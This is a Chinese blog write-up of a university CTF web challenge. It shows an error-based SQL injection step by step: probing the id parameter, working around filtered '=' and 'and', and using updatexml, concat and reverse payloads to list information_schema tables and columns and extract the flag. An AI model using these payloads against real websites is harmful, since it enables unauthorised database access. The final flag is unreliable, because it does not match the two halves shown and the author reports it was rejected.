第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路相关的知识,希望对你有一定的参考价值。

1.发现SQL注入

在这里插入图片描述

?id=1			有数据
?id=2			有数据
?id=2-1			有数据

2.尝试SQLMap

发现报错:
在这里插入图片描述

3.经实验发现过滤了"=“和"and”

发现页面会返回错误信息,尝试报错注入:
在这里插入图片描述

用到函数:updatexml
updatexml(目标xml内容,xml文档路径,更新的内容)
查询库名
?id=updatexml(1,concat(0x7e,(select database()),0x7e),1)  发现库名:word

在这里插入图片描述

查询有多少张表:
?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.tables ),0x7e),1)  

在这里插入图片描述

查询表名:
?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e),1)?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 83,1),0x7e),1)

发现有张f14g的表
在这里插入图片描述

查询字段数:
?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.columns ),0x7e),1)

在这里插入图片描述

查询字段名:
?id=updatexml(1,concat(0x7e,(select column_name from information_schema.columns limit 0,1),0x7e),1)?id=updatexml(1,concat(0x7e,(select column_name from information_schema.columns limit 811,1),0x7e),1)

找到f14g字段
在这里插入图片描述

读出数据
?id=updatexml(1,concat(0x7e,(select f14g from f14g),0x7e),1)
发现flag信息不全
flag{b892889e-6bbd-421d-b984-d6

reverse()函数

在这里插入图片描述
在这里插入图片描述

颠倒flag内容,从后往前取
?id=updatexml(1,concat(reverse((select f14g from f14g))),1)
}ef99546fdb6d-489b-d124-dbb6-e98

在这里插入图片描述

flag

flag{b892889e-6bbd-421d-b984-d6

}ef99546fdb6d-489b-d124-dbb6-e98
取反:
89e-6bbd-421d-b984-d6dbf64599fe}

flag{b892889e-6bbd-421d-b984-d66dbf64599fe}

所以最后flag为:flag{b892889e-6bbd-421d-b984-d66dbf64599fe}。


总结

不知道为什么i春秋里的这道题flag提交一直报错。。。。。。也是无语了

在这里插入图片描述

以上是关于第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路的主要内容,如果未能解决你的问题,请参考以下文章

i春秋-第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?

i春秋首届全国数据安全大赛部分复盘

百度杯CTF夺旗大赛9月场writeup

[i春秋]“百度杯”CTF比赛 十月场-Hash

2016全国大学生信息安全竞赛(Misc)

2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup